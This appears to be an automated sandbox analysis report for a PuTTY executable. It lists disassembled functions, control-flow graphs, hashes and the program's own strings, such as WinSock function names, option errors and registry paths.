                      • API ID: Text$DialogExtentItemMessageModeObjectPointRectSelectSend
                      • String ID: !dp->shortcuts[s]$&$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$EDIT$STATIC$ncols <= lenof(columns)$ret == c$thisc$win
                      • API String ID: 3577962795-4092102353
                      • Opcode ID: ec6d94e86e4548b55d565a1d0e12ac1d8a0f0232561a0fe27072ccf633115005
                      • Instruction ID: 86db64f917dea463378c6cbe125d1067e656c4e4abe1eb002f85e5b0c0d11a5e
                      • Opcode Fuzzy Hash: ec6d94e86e4548b55d565a1d0e12ac1d8a0f0232561a0fe27072ccf633115005
                      • Instruction Fuzzy Hash: B622D363A18AC285FB609B29D4443BA7BA1FF94784F644135DE8D83795EF3CE944CB08
                      Function 00007FF6785DCB24 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 287COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2823 7ff6785dcb24-7ff6785dcb61 call 7ff678606ec0 call 7ff678611b80 call 7ff678609070 call 7ff6785d6c80 call 7ff6785d6cf0 2834 7ff6785dcb63-7ff6785dcb6d call 7ff6786125d0 2823->2834 2835 7ff6785dcb82-7ff6785dcb8f call 7ff6785d6da0 2823->2835 2840 7ff6785dcb6f-7ff6785dcb79 call 7ff6785f2a50 2834->2840 2841 7ff6785dcb91-7ff6785dcba1 call 7ff678606d60 2834->2841 2835->2841 2842 7ff6785dcbac-7ff6785dcbaf 2835->2842 2840->2841 2855 7ff6785dcb7b-7ff6785dcb7d call 7ff6785d6bd0 2840->2855 2851 7ff6785dce44-7ff6785dce6d call 7ff6786090c0 call 7ff678611d70 call 7ff678611b80 2841->2851 2852 7ff6785dcba7 2841->2852 2844 7ff6785dcbb1-7ff6785dcbce call 7ff6786176a0 2842->2844 2845 7ff6785dcbec-7ff6785dcbf4 call 7ff678606d60 2842->2845 2844->2845 2858 7ff6785dcbd0-7ff6785dcbea 2844->2858 2859 7ff6785dce3a-7ff6785dce42 2845->2859 2857 7ff6785dce72-7ff6785dce9e call 7ff6786139c0 call 7ff67868a9f0 2851->2857 2852->2857 2855->2835 2864 7ff6785dcc38-7ff6785dcc42 2858->2864 2859->2851 2861 7ff6785dce9f-7ff6785dcea9 call 7ff678606e50 2859->2861 2861->2857 2877 7ff6785dceab-7ff6785dceae call 7ff6785f2a50 2861->2877 2865 7ff6785dcc44-7ff6785dcc4b 2864->2865 2866 7ff6785dcc50 2864->2866 2870 7ff6785dcc52-7ff6785dcc6d call 7ff678605310 2865->2870 2866->2870 2881 7ff6785dcc6f-7ff6785dcc72 2870->2881 2882 7ff6785dcc20 2870->2882 2880 7ff6785dceb3-7ff6785dceb5 2877->2880 2880->2857 2883 7ff6785dceb7 2880->2883 2884 7ff6785dcc74-7ff6785dcc77 2881->2884 2885 7ff6785dcc2a-7ff6785dcc32 2881->2885 2886 7ff6785dcc23-7ff6785dcc27 2882->2886 2890 7ff6785dcebc-7ff6785dcec5 call 7ff6785f4690 call 7ff678698284 2883->2890 2887 7ff6785dcc90-7ff6785dcca1 call 7ff67869fc60 2884->2887 2888 7ff6785dcc79 2884->2888 2885->2864 2889 7ff6785dce27-7ff6785dce34 call 7ff678606d60 2885->2889 2886->2885 2900 7ff6785dceca-7ff6785dcf13 call 7ff678612890 * 2 call 7ff678616310 2887->2900 2901 7ff6785dcca7-7ff6785dccb4 call 7ff67869fc60 2887->2901 2891 7ff6785dcc80-7ff6785dcc8b call 7ff6785d6f80 2888->2891 2889->2859 2902 7ff6785dcf42-7ff6785dcf73 call 7ff6786090c0 call 7ff678611d70 call 7ff6785f2a50 call 7ff6785d6bd0 2889->2902 2890->2900 2891->2886 2933 7ff6785dcf15 call 7ff67860e090 2900->2933 2934 7ff6785dcf1a-7ff6785dcf2c call 7ff678613590 * 2 call 7ff678698284 2900->2934 2910 7ff6785dcf31-7ff6785dcf3d call 7ff678616430 call 7ff678698284 2901->2910 2911 7ff6785dccba-7ff6785dccc1 2901->2911 2910->2902 2914 7ff6785dccc3-7ff6785dccd4 call 7ff67869fc60 2911->2914 2915 7ff6785dcd1f-7ff6785dcd2c call 7ff67869fc60 2911->2915 2914->2890 2932 7ff6785dccda-7ff6785dcceb call 7ff67869fc60 2914->2932 2929 7ff6785dcd2e-7ff6785dcd3f call 7ff67869fc60 2915->2929 2930 7ff6785dcd58-7ff6785dcd5c 2915->2930 2946 7ff6785dcd6e-7ff6785dcd77 2929->2946 2947 7ff6785dcd41-7ff6785dcd46 2929->2947 2939 7ff6785dcd62-7ff6785dcd69 2930->2939 2940 7ff6785dcbf9-7ff6785dcc1d 2930->2940 2932->2890 2948 7ff6785dccf1-7ff6785dcd02 call 7ff67869fc60 2932->2948 2933->2934 2934->2910 2939->2891 2940->2882 2952 7ff6785dce0e-7ff6785dce15 2946->2952 2953 7ff6785dcd7d-7ff6785dcdac call 7ff67869e168 2946->2953 2950 7ff6785dce02-7ff6785dce09 2947->2950 2951 7ff6785dcd4c-7ff6785dcd53 2947->2951 2948->2890 2959 7ff6785dcd08-7ff6785dcd19 call 7ff67869fc60 2948->2959 2950->2891 2951->2891 2952->2891 2960 7ff6785dcdae-7ff6785dcdb8 call 7ff6785d6f80 2953->2960 2961 7ff6785dcdbd-7ff6785dcdc9 call 7ff678613bc0 2953->2961 2959->2890 2959->2915 2960->2961 2967 7ff6785dcdd0-7ff6785dcde8 call 7ff67869e2f0 2961->2967 2970 7ff6785dce1a-7ff6785dce22 call 7ff67869d968 2967->2970 2971 7ff6785dcdea-7ff6785dce00 call 7ff678612af0 2967->2971 2970->2886 2971->2967
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: DeleteObject$DestroyIconUninitialize
                      • String ID: %s Warning$%s expects an output filename$%s expects input and output filenames$--host-ca$--host_ca$-cleanup$-demo-config-box$-demo-terminal$-pgpfp$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$can't open input file '%s'$demo-server.example.com$option "%s" requires an argument$unexpected argument "%s"$unknown option "%s"
                      • API String ID: 1128191211-528882638
                      • Opcode ID: 4a2046309144862b578dab4bd3a57a42867108dd8b234306e9b228e6a68a3681
                      • Instruction ID: e12ecc5b8200a38ace597d95803dfc5e17c80c4780845ec164c24b762e9d8fd7
                      • Opcode Fuzzy Hash: 4a2046309144862b578dab4bd3a57a42867108dd8b234306e9b228e6a68a3681
                      • Instruction Fuzzy Hash: 8AB13D63A3C50391FE94A73194912BA2E91AF41B90F744435ED0ECB7D6DE2CED02A39D
                      Function 00007FF6785DD100 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 74libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 3169 7ff6785dd100-7ff6785dd10c 3170 7ff6785dd114-7ff6785dd122 call 7ff6786162c0 3169->3170 3171 7ff6785dd10e-7ff6785dd113 3169->3171 3173 7ff6785dd127-7ff6785dd12d 3170->3173 3174 7ff6785dd12f-7ff6785dd149 GetProcAddress 3173->3174 3175 7ff6785dd176 3173->3175 3176 7ff6785dd181-7ff6785dd189 FreeLibrary 3174->3176 3177 7ff6785dd14b-7ff6785dd152 3174->3177 3175->3176 3180 7ff6785dd190-7ff6785dd1b7 FindResourceA 3176->3180 3178 7ff6785dd1f1 3177->3178 3179 7ff6785dd158-7ff6785dd166 3177->3179 3182 7ff6785dd1f8-7ff6785dd1fb 3178->3182 3179->3180 3183 7ff6785dd168-7ff6785dd172 3179->3183 3180->3178 3181 7ff6785dd1b9-7ff6785dd1c9 SizeofResource 3180->3181 3181->3178 3184 7ff6785dd1cb-7ff6785dd1dd LoadResource 3181->3184 3182->3171 3185 7ff6785dd201-7ff6785dd21a call 7ff6786169b0 3182->3185 3183->3181 3186 7ff6785dd174 3183->3186 3184->3178 3187 7ff6785dd1df-7ff6785dd1ef LockResource 3184->3187 3190 7ff6785dd23b-7ff6785dd249 3185->3190 3191 7ff6785dd21c-7ff6785dd235 call 7ff6786169b0 3185->3191 3186->3178 3187->3182 3190->3171 3191->3171 3191->3190
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: HtmlHelpA$Software\SimonTatham\PuTTY64\CHMPath$Software\SimonTatham\PuTTY\CHMPath$hhctrl.ocx
                      • API String ID: 190572456-509675872
                      • Opcode ID: a0bc5a2a65dc4d9eae7fa86a812b878beada9e314c77d15a1f4f1c0575aebb16
                      • Instruction ID: 455a3ac43823aa67039d0391d75544365badba3962412d75d389373549c00893
                      • Opcode Fuzzy Hash: a0bc5a2a65dc4d9eae7fa86a812b878beada9e314c77d15a1f4f1c0575aebb16
                      • Instruction Fuzzy Hash: F9315E63E2D743A1FA958779A85C3362E90AF26780F345034CA0DC63D4DE2CFC85A718
                      Function 00007FF6785F65F0 Relevance: 13.1, Strings: 10, Instructions: 600COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 3208 7ff6785f65f0-7ff6785f664d call 7ff678626590 3211 7ff6785f6653-7ff6785f6656 3208->3211 3212 7ff6785f670c-7ff6785f6716 3208->3212 3213 7ff6785f681c-7ff6785f6878 3211->3213 3214 7ff6785f665c-7ff6785f66a7 call 7ff6786134f0 call 7ff678614b00 3211->3214 3212->3213 3215 7ff6785f671c-7ff6785f675d call 7ff6786134f0 call 7ff67861a3a0 3212->3215 3216 7ff6785f83d0 3213->3216 3217 7ff6785f687e-7ff6785f68b2 3213->3217 3246 7ff6785f66c2-7ff6785f6706 3214->3246 3247 7ff6785f66a9-7ff6785f66bd call 7ff67869b8ac 3214->3247 3243 7ff6785f675f-7ff6785f676e call 7ff678614b00 3215->3243 3244 7ff6785f6789-7ff6785f6799 call 7ff678614b00 3215->3244 3223 7ff6785f83d5-7ff6785f83e1 3216->3223 3221 7ff6785f6913-7ff6785f6927 3217->3221 3224 7ff6785f6b90-7ff6785f6b96 3221->3224 3225 7ff6785f692d-7ff6785f6930 3221->3225 3228 7ff6785f84dd-7ff6785f84ec 3223->3228 3229 7ff6785f83e7 3223->3229 3234 7ff6785f6bb1-7ff6785f6bc5 3224->3234 3235 7ff6785f6b98-7ff6785f6bac call 7ff67869b8ac 3224->3235 3231 7ff6785f6c00-7ff6785f6cb2 3225->3231 3232 7ff6785f6936-7ff6785f6949 3225->3232 3237 7ff6785f8501-7ff6785f8506 3228->3237 3230 7ff6785f83e9-7ff6785f83f0 3229->3230 3238 7ff6785f83f2-7ff6785f8403 3230->3238 3239 7ff6785f8409-7ff6785f8418 3230->3239 3240 7ff6785f6ccd-7ff6785f6cd1 3231->3240 3241 7ff6785f6964-7ff6785f6969 3232->3241 3242 7ff6785f694b-7ff6785f695f call 7ff67869b8ac 3232->3242 3248 7ff6785f6bcb-7ff6785f6bd6 3234->3248 3249 7ff6785f6ec6 3234->3249 3235->3234 3250 7ff6785f850e-7ff6785f8512 3237->3250 3251 7ff6785f8508-7ff6785f850c 3237->3251 3238->3239 3257 7ff6785f8405 3238->3257 3261 7ff6785f84b1-7ff6785f84dc call 7ff67868a9f0 3239->3261 3262 7ff6785f841e-7ff6785f8421 3239->3262 3258 7ff6785f6cd3-7ff6785f6cdc 3240->3258 3259 7ff6785f6cc0-7ff6785f6ccb 3240->3259 3264 7ff6785f696f-7ff6785f697b 3241->3264 3265 7ff6785f6d6a-7ff6785f6d74 3241->3265 3242->3241 3243->3244 3286 7ff6785f6770-7ff6785f6784 call 7ff67869b8ac 3243->3286 3293 7ff6785f67b4-7ff6785f6814 call 7ff6785f51e0 3244->3293 3294 7ff6785f679b-7ff6785f67af call 7ff67869b8ac 3244->3294 3246->3212 3246->3213 3247->3246 3256 7ff6785f6be0-7ff6785f6be8 3248->3256 3254 7ff6785f6ec8-7ff6785f6ee1 call 7ff67869b8ac 3249->3254 3252 7ff6785f8514-7ff6785f851a 3250->3252 3253 7ff6785f84f0-7ff6785f84fb 3250->3253 3251->3250 3252->3253 3253->3230 3253->3237 3268 7ff6785f6ee4-7ff6785f6f43 3254->3268 3256->3268 3269 7ff6785f6bee-7ff6785f6bf5 3256->3269 3257->3239 3258->3259 3259->3240 3270 7ff6785f6ce0-7ff6785f6ce6 3259->3270 3262->3261 3271 7ff6785f8427-7ff6785f84a7 call 7ff6785f51e0 3262->3271 3273 7ff6785f697d-7ff6785f6991 call 7ff67869b8ac 3264->3273 3274 7ff6785f6996-7ff6785f6999 3264->3274 3276 7ff6785f68b4 3265->3276 3277 7ff6785f6d7a-7ff6785f6d90 3265->3277 3281 7ff6785f6f50-7ff6785f6f60 3268->3281 3269->3256 3282 7ff6785f6bf7 3269->3282 3283 7ff6785f6f45-7ff6785f6f48 3270->3283 3284 7ff6785f6cec-7ff6785f6cf2 3270->3284 3302 7ff6785f84ac 3271->3302 3273->3274 3288 7ff6785f6af5-7ff6785f6af7 3274->3288 3289 7ff6785f699f-7ff6785f69bb 3274->3289 3279 7ff6785f68b9-7ff6785f68f7 3276->3279 3291 7ff6785f6e9a-7ff6785f6ead 3277->3291 3292 7ff6785f6d96-7ff6785f6db9 3277->3292 3297 7ff6785f6900-7ff6785f690d 3279->3297 3298 7ff6785f851c-7ff6785f853b call 7ff67869b8ac call 7ff6785d7a30 3281->3298 3299 7ff6785f6f66-7ff6785f6f74 3281->3299 3282->3254 3283->3281 3300 7ff6785f6cf4-7ff6785f6d08 call 7ff67869b8ac 3284->3300 3301 7ff6785f6d0d-7ff6785f6d65 3284->3301 3286->3244 3295 7ff6785f7613-7ff6785f761b 3288->3295 3296 7ff6785f6afd-7ff6785f6b1e 3288->3296 3304 7ff6785f69c1-7ff6785f69df 3289->3304 3305 7ff6785f6a96-7ff6785f6a9c 3289->3305 3309 7ff6785f6eb0-7ff6785f6ebf 3291->3309 3306 7ff6785f6dc0-7ff6785f6e41 3292->3306 3318 7ff6785f6819 3293->3318 3294->3293 3295->3297 3311 7ff6785f6b20-7ff6785f6b7d 3296->3311 3297->3221 3313 7ff6785f83b8-7ff6785f83cc 3297->3313 3299->3295 3300->3301 3301->3281 3302->3261 3315 7ff6785f69e0-7ff6785f6a90 3304->3315 3305->3288 3316 7ff6785f6a9e-7ff6785f6aba 3305->3316 3306->3306 3317 7ff6785f6e47-7ff6785f6e94 3306->3317 3309->3309 3310 7ff6785f6ec1 3309->3310 3310->3279 3311->3311 3319 7ff6785f6b7f-7ff6785f6b87 3311->3319 3313->3223 3321 7ff6785f83ce 3313->3321 3315->3305 3315->3315 3322 7ff6785f6ac0-7ff6785f6af3 3316->3322 3317->3279 3317->3291 3318->3213 3319->3297 3321->3239 3322->3288 3322->3322
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: !ctrl->delay_taborder$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$BUTTON$STATIC$false && "bad control type in winctrl_layout"$i < ntabdelays$ncols <= lenof(columns)$ntabdelays < lenof(tabdelays)$ret == c
                      • API String ID: 1949149715-1213610268
                      • Opcode ID: bfba1759a0df8782f979f6f4575ff45775d3f30527cdd1423e35be01de23b612
                      • Instruction ID: 59b34c3dc9d05bde51b0fe87297d96dd52fb8a59d5442ab018372f786641cc68
                      • Opcode Fuzzy Hash: bfba1759a0df8782f979f6f4575ff45775d3f30527cdd1423e35be01de23b612
                      • Instruction Fuzzy Hash: 9352C173A18B8186E7218B29E4453AABBA0FB99794F144335DF8C93794EF3CE545CB04
                      Function 00007FF67864A3E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: NameUser$AddressProc
                      • String ID: GetUserNameExA$secur32.dll$sspicli.dll
                      • API String ID: 9235790-676772081
                      • Opcode ID: 51967d74fa85260e4ba4e7d391479f03c81e0dd2628215960d683692680a8cc6
                      • Instruction ID: 640c0f5a6d86c64c0f1a21efb1366d1511ebc5eb1b5d6772878e9efd405361c1
                      • Opcode Fuzzy Hash: 51967d74fa85260e4ba4e7d391479f03c81e0dd2628215960d683692680a8cc6
                      • Instruction Fuzzy Hash: 4031C422E3C15272F6519B36A41437F1F419F84B84F608035C84E8BBC5DE3CED02AB08
                      Function 00007FF67860E2C0 Relevance: 138.6, APIs: 40, Strings: 39, Instructions: 320libraryloadernetworkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1524 7ff67860e2c0-7ff67860e2e1 call 7ff6786162c0 1527 7ff67860e2ff-7ff67860e312 GetProcAddress 1524->1527 1528 7ff67860e2e3-7ff67860e2f9 call 7ff6786162c0 1524->1528 1530 7ff67860e35e-7ff67860e374 call 7ff6786162c0 1527->1530 1531 7ff67860e314-7ff67860e31e 1527->1531 1528->1527 1537 7ff67860ea07-7ff67860ea0e call 7ff6785d6000 1528->1537 1543 7ff67860e376-7ff67860e397 GetProcAddress 1530->1543 1544 7ff67860e3e7-7ff67860e3f1 1530->1544 1533 7ff67860e3c8 1531->1533 1534 7ff67860e324-7ff67860e342 GetProcAddress 1531->1534 1536 7ff67860e3d3 1533->1536 1534->1536 1538 7ff67860e348-7ff67860e35c GetProcAddress 1534->1538 1541 7ff67860e3de 1536->1541 1546 7ff67860ea13-7ff67860ea2d call 7ff6785d6000 1537->1546 1542 7ff67860e3ad-7ff67860e3b7 1538->1542 1548 7ff67860e3e0 1541->1548 1542->1541 1547 7ff67860e3b9-7ff67860e3c6 GetProcAddress 1542->1547 1543->1536 1545 7ff67860e399-7ff67860e3a6 GetProcAddress 1543->1545 1549 7ff67860e402 1544->1549 1550 7ff67860e3f3-7ff67860e400 GetProcAddress 1544->1550 1545->1542 1556 7ff67860ea46 1546->1556 1557 7ff67860ea2f-7ff67860ea34 1546->1557 1547->1548 1548->1544 1552 7ff67860e404-7ff67860e415 1549->1552 1550->1552 1554 7ff67860e41b-7ff67860e439 GetProcAddress 1552->1554 1555 7ff67860e841 1552->1555 1558 7ff67860e84c 1554->1558 1559 7ff67860e43f-7ff67860e45d GetProcAddress 1554->1559 1555->1558 1557->1556 1560 7ff67860ea36-7ff67860ea3e 1557->1560 1561 7ff67860e857 1558->1561 1559->1561 1562 7ff67860e463-7ff67860e481 GetProcAddress 1559->1562 1560->1556 1563 7ff67860ea40-7ff67860ea43 1560->1563 1564 7ff67860e862 1561->1564 1562->1564 1565 7ff67860e487-7ff67860e4a5 GetProcAddress 1562->1565 1563->1556 1566 7ff67860e86d 1564->1566 1565->1566 1567 7ff67860e4ab-7ff67860e4c9 GetProcAddress 1565->1567 1568 7ff67860e878 1566->1568 1567->1568 1569 7ff67860e4cf-7ff67860e4ed GetProcAddress 1567->1569 1570 7ff67860e883 1568->1570 1569->1570 1571 7ff67860e4f3-7ff67860e511 GetProcAddress 1569->1571 1572 7ff67860e88e 1570->1572 1571->1572 1573 7ff67860e517-7ff67860e535 GetProcAddress 1571->1573 1574 7ff67860e899 1572->1574 1573->1574 1575 7ff67860e53b-7ff67860e559 GetProcAddress 1573->1575 1576 7ff67860e8a4 1574->1576 1575->1576 1577 7ff67860e55f-7ff67860e57d GetProcAddress 1575->1577 1578 7ff67860e8af 1576->1578 1577->1578 1579 7ff67860e583-7ff67860e5a1 GetProcAddress 1577->1579 1580 7ff67860e8ba 1578->1580 1579->1580 1581 7ff67860e5a7-7ff67860e5c5 GetProcAddress 1579->1581 1582 7ff67860e8c5 1580->1582 1581->1582 1583 7ff67860e5cb-7ff67860e5e9 GetProcAddress 1581->1583 1584 7ff67860e8d0 1582->1584 1583->1584 1585 7ff67860e5ef-7ff67860e60d GetProcAddress 1583->1585 1586 7ff67860e8db 1584->1586 1585->1586 1587 7ff67860e613-7ff67860e631 GetProcAddress 1585->1587 1588 7ff67860e8e6 1586->1588 1587->1588 1589 7ff67860e637-7ff67860e655 GetProcAddress 1587->1589 1590 7ff67860e8f1 1588->1590 1589->1590 1591 7ff67860e65b-7ff67860e679 GetProcAddress 1589->1591 1592 7ff67860e8fc 1590->1592 1591->1592 1593 7ff67860e67f-7ff67860e69d GetProcAddress 1591->1593 1594 7ff67860e907 1592->1594 1593->1594 1595 7ff67860e6a3-7ff67860e6c1 GetProcAddress 1593->1595 1596 7ff67860e912 1594->1596 1595->1596 1597 7ff67860e6c7-7ff67860e6e5 GetProcAddress 1595->1597 1598 7ff67860e91d 1596->1598 1597->1598 1599 7ff67860e6eb-7ff67860e709 GetProcAddress 1597->1599 1600 7ff67860e928 1598->1600 1599->1600 1601 7ff67860e70f-7ff67860e72d GetProcAddress 1599->1601 1602 7ff67860e933 1600->1602 1601->1602 1603 7ff67860e733-7ff67860e751 GetProcAddress 1601->1603 1604 7ff67860e93e 1602->1604 1603->1604 1605 7ff67860e757-7ff67860e775 GetProcAddress 1603->1605 1606 7ff67860e949 1604->1606 1605->1606 1607 7ff67860e77b-7ff67860e799 GetProcAddress 1605->1607 1608 7ff67860e954 1606->1608 1607->1608 1609 7ff67860e79f-7ff67860e7bd GetProcAddress 1607->1609 1610 7ff67860e95f 1608->1610 1609->1610 1611 7ff67860e7c3-7ff67860e7e1 GetProcAddress 1609->1611 1612 7ff67860e96a 1610->1612 1611->1612 1613 7ff67860e7e7-7ff67860e805 GetProcAddress 1611->1613 1614 7ff67860e975 1612->1614 1613->1614 1615 7ff67860e80b-7ff67860e829 GetProcAddress 1613->1615 1616 7ff67860e980 1614->1616 1615->1616 1617 7ff67860e82f-7ff67860e83c GetProcAddress 1615->1617 1618 7ff67860e982-7ff67860e99c WSAStartup 1616->1618 1617->1618 1619 7ff67860e9ab-7ff67860e9be WSAStartup 1618->1619 1620 7ff67860e99e-7ff67860e9a9 1618->1620 1622 7ff67860e9cd-7ff67860e9e0 WSAStartup 1619->1622 1623 7ff67860e9c0-7ff67860e9cb 1619->1623 1620->1619 1621 7ff67860e9ef-7ff67860ea06 call 7ff678614a20 1620->1621 1622->1546 1624 7ff67860e9e2-7ff67860e9ed 1622->1624 1623->1621 1623->1622 1624->1546 1624->1621
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc$Startup$LibraryLoad
                      • String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyname$gethostname$getnameinfo$getpeername$getservbyname$htonl$htons$inet_addr$inet_ntoa$inet_ntop$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll$wsock32.dll
                      • API String ID: 1450042416-3487058210
                      • Opcode ID: 63f1f37c3d983cc709cba1ade68d615c3cf9c675a72a3cd915984577514d7544
                      • Instruction ID: 3255a96c4cca4222781e536e05c08a35deadfaae3b59d46745c12a188baabe4c
                      • Opcode Fuzzy Hash: 63f1f37c3d983cc709cba1ade68d615c3cf9c675a72a3cd915984577514d7544
                      • Instruction Fuzzy Hash: 4912E76A93AB17A0FA45CB74E8647323EA2AF64750F740435C40DCA264EF6CFD44AA5C
                      Function 00007FF6785F738D Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 277windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
